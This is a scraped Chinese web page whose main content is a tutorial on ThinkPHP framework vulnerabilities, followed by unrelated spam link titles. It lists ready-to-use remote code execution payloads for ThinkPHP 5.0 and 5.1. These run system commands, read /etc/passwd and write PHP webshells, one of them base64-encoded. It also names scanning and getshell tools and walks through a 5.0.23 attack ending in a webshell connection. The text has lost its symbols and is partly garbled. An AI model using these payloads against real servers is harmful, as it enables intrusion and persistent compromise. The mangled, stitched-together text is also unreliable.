当前位置: 首页 > news >正文

上海网站建设服石家庄软件公司排名

上海网站建设服,石家庄软件公司排名,凡科快图免费版商用,网站建设易网宣常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开… 常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的所以thinkphp出问题的话会影响很多基于thinkphp开发的网站。 二、Thinkphp历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致GetshellThinkPHP5_SQL注入漏洞敏感信息泄露ThinkPHP3.2.3_最新版update注入漏洞ThinkPHP5.0.10缓存函数设计缺陷可导致GetshellThinkPHP3.2.X_find_select_delete注入ThinkPHP框架5.0.X_sql注入漏洞分析ThinkPHP3.X_order_by注入漏洞ThinkPHP5.X_order_by注入漏洞ThinkPHP5.X_远程代码执行 三、Thinkphp特征发现 默认页面 错误页面 开启了debug模式的错误页面 - 未开启debug模式的错误页面四、批量漏洞检测 https://github.com/Lucifer1993/TPscan python TPscan.pyhttps://github.com/theLSA/tp5-getshell python2.7 tp5-getshell.py -u http://192.168.9.148:8080/说明漏洞存在可以进行漏洞利用。使用ThinkphpGUI-1.2-SNAPSHOT进行漏洞扫描和命令执行。 切换版本进行命令执行。 五、漏洞总结 Thinkphp3 漏洞总结https://y4er.com/post/thinkphp3-vuln/ Thinkphp5 RCE总结https://y4er.com/post/thinkphp5-rce/ 5.0.* 常用PoC #执行命令 /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1#写入Webshell /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]file_put_contentsvars[1][]shell.phpvars[1][]?php eval($_POST[ccc]);?/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg | base64 -d shell9.php 5.1.* 常用PoC #执行命令 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?s/index/\think\request/cachekey1|phpinfo#写入Webshell /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo ?php eval($_POST[ccc]);? shell.php (echo ^?php eval($_POST[ccc]);?^ shell1.php)/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1]]whoami /index.php?sindex/\think\Request/inputfilterphpinfodata1 /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\view\driver\Php/displaycontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1六、5.0.23版本案例演示 1、查看。 #查看 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]cat /etc/passwd_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]ls2、写入木马文件。 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]echo ?php eval(\$_POST[cmd]);? 1.php3、写入成功。 4、使用蚁剑进行连接。
http://www.pierceye.com/news/7768/

相关文章:

  • p2p网站建设费用什么是运营管理
  • 怎么做公司销售网站网络服务提供者应当将该声明转送发出通知的权利人
  • 胖咯科技网站建设建筑类电商网站
  • seo网站优化方案摘要如何用虚拟主机安装wordpress
  • 网站怎么快速做排名财务部官方网站经济建设司
  • 可以自己做课程的网站app平台开发需要的资源与团队
  • 惠州规划建设局网站网站建设招标评分
  • 企业网站优化三层含义公司大气聚财的名字
  • 小企业网站建设收费外包 网站开发公司
  • 建一个网站需要哪些人张家界做网站dcwork
  • 做期货看啥子网站wordpress点击分类目录空白
  • 网站主页用ps做网站建设公司推广广告语
  • php如何做音乐网站哪个网站能在家做兼职
  • 网站的会员系统怎么做自动外链网址
  • 营销型网站的功能亚马逊电子商务网站的建设
  • 在哪学短视频培训课程浦东新区网站优化公司
  • 淘宝代码网站有哪些工程建设的基本内容
  • 两学一做山西答题网站wordpress客户端连接数据库连接
  • 传统网站网站常州网站建设案例
  • 推广关键词江门百度seo公司
  • 网站关键字怎么设置wordpress在文章里面加歌曲
  • 扬中网站建设方案网站建设几个要素
  • 销售网站建设电子商务网站建设的试卷
  • 评析网站建设报价单东莞网站优化方案
  • 信产部网站备案dedecms本地可以更换网站模板出现网站模板不存在
  • 有哪个网站做策划方案的长沙网上注册公司流程
  • 网站建设分几块网站建设工作简介
  • 手机上怎么支持wap网站dede仿手机网站模板
  • 动漫网站设计报告苏州保洁公司有多少家
  • 网站设计论文5000wordpress获取文章数量